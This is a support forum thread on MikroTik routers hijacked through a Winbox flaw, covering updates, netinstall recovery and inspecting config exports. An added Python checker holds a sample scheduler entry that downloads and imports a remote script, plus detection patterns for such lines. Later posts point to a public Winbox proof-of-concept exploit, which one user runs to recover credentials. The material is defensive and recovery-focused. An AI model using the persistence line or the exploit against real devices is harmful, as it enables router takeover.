URGENT security reminder

Update for sure!!!

We should have automatic security updates. Security updates are different from feature upgrades, and for mission-critical devices such as routers, security updates should be included.

Automatic security upgrades can ONLY be implemented if they can be disabled. Opt-out MUST be possible.

But officially supported automatic updates would need bigger changes; the current release channels are not perfect for this. The “stable” channel (previously “current”) is out, because it breaks things every now and then. When it happens to a few early adopters, it’s not good, but imagine thousands of routers all over the world breaking; it would be some bad publicity. The “long term” channel (previously “bugfix”) is better, but not completely safe either. Upgrades from a.b.C to a.b.D should be ok, but a.B.x to a.C.x brings bigger changes and something can go wrong (e.g. the current bridge/switch changes don’t seem to work for all people).

To make it as safe as possible, there would have to be some “microupdates” with only minimal changes, strictly security-only. But MikroTik can hardly provide them for every version they release.

Hi All,

I updated my RouterOS from v6.41 to v6.43.2, updated Winbox to the current version, updated the admin password, and still the hacker was able to get full control of the system, locking me out.

What’s the way out again?

Thank you

It is highly probable that the attacker installed some stealth script which allows her to regain control. The only way out is to netinstall the router (during that process the router’s NAND storage is formatted) and then configure the router from scratch. It is vital not to use a backup to restore the configuration; a text export can be handy when configuring … but be careful not to copy any configuration bit for which you’re not sure why it’s there.

Ok! That is cool. I have a backup copy of the /export file; I will reload the script from scratch as a security measure.

Thanks

Before loading exported configuration do inspect it in case it contains something suspicious.
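A small checker for the export-inspection step above, written as an added example that is not from the thread or from MikroTik: it walks a RouterOS `/export` text, joins continuation lines, and flags every entry in the sections where persistence usually lands (scheduler, scripts, users, SOCKS), so each one has to be justified before it is re-applied. The sample export, its IP address and hostname are constructed.

```python
import re

# Constructed sample of a RouterOS "/export" text (not from the thread); the sys-upd scheduler,
# the extra user, the disabled admin and the SOCKS proxy are the planted oddities.
SAMPLE_EXPORT = r"""# sep/11/2018 10:00:00 by RouterOS 6.43.2
/system scheduler
add interval=1d name=get-config on-event=fetch-config start-time=startup
add interval=10m name=sys-upd on-event=":do {/tool fetch url=\"http://203.0.113.5/a.rsc\";\
    /import a.rsc}" start-time=startup
/system script
add name=fetch-config source="/tool fetch url=https://config.example.net/cpe.rsc"
/user
add group=full name=service
set [ find name=admin ] disabled=yes
/ip socks
set enabled=yes port=4145
"""
WATCH_SECTIONS = {"/system scheduler", "/system script", "/user", "/ip socks"}  # persistence spots
# Heuristics checked in order; the first match supplies the reason.
SUSPICIOUS = [
    (re.compile(r"/tool fetch"), "fetches a remote file"),
    (re.compile(r"/import\b"), "imports a script"),
    (re.compile(r"admin.*disabled=yes|disabled=yes.*admin"), "admin account disabled"),
    (re.compile(r"^set enabled=yes"), "service enabled"),
    (re.compile(r"^add "), "object added (confirm you know why it exists)"),
]
def iter_logical_lines(text):
    """Join RouterOS continuation lines (a trailing backslash) into one logical line."""
    buf = ""
    for raw in text.splitlines():
        if raw.endswith("\\"):
            buf += raw[:-1]
            continue
        yield (buf + raw).strip()
        buf = ""
def find_suspicious(export_text):
    """Return (section, line, reason) for each watched-section line matching a heuristic."""
    findings, section = [], None
    for line in iter_logical_lines(export_text):
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            section = line  # a line starting with "/" opens a new menu section
            continue
        if section not in WATCH_SECTIONS:
            continue
        for pattern, reason in SUSPICIOUS:
            if pattern.search(line):
                findings.append((section, line, reason))
                break
    return findings
```

Run `find_suspicious` over your own export and go through every hit; the legitimate get-config entry is flagged on purpose, because the point is that nothing in these sections gets copied back unexplained.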

Sure! I will check it well.

Thanks

Hi All,

I have a question regarding the Winbox connection mode; is it highly secure or not at all? SSH or telnet connection?

If we say the Winbox connection is SSH, why do I see this in my box? See attached file: telnet or ssh..JPG

After you’ve connected with Winbox, and then click on “New Terminal”, you’ll see user logged in via telnet messages.

Yes, I saw it. What does that mean? SSH or telnet connection via Winbox?

Yes, this is what it means.

Thanks for the link.

Hi, we have hundreds of MikroTik CPEs with public static IPs; fortunately, only a few of them (5) have a ROS version afflicted by the vulnerability. They came from the factory with ROS 6.40.3, and a few hours after installation, someone used the vulnerability to change the password and lock us out. In our configuration, we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disabled it too… So my question is, is there any way to bring back control of these CPEs remotely, or is the only way to do it locally with Netinstall?

If your user account has been disabled, then Netinstall is the only option.
However, most popular attacks leave the user account open, so try to log in from the local network side.

Probably they changed the admin password, or they disabled the “admin” user…; I receive an “invalid username or password” during login attempts…

If it is an old RouterOS and you get “bad password”, it means you have access to the vulnerable Winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC. It is really simple to use; all you need is python3 installed and the IP/MAC of the device.
Someone hacked your device? Hack it back for yourself! :smiley:

The ROS version is 6.40.3; I was able to run the Proof of Concept successfully, but the obtained credentials still don’t work… :-/

EDIT: it works! They have limited the login of the users only to certain IPs, but MAC telnet is my friend :slight_smile: thanks a lot!!!

I’ve been exposed to this vulnerability until last week. I had the impression that I had the WinBox port closed for WAN. The ISP’s CGNAT rollout without any notification misled me into thinking that my ports were closed when being scanned from the internet.

I’ve updated the software, but I’m a bit paranoid. How can I make sure that the router’s software/firmware/etc. hasn’t been tampered with in any way while I was vulnerable, and that there’s no backdoor still left open?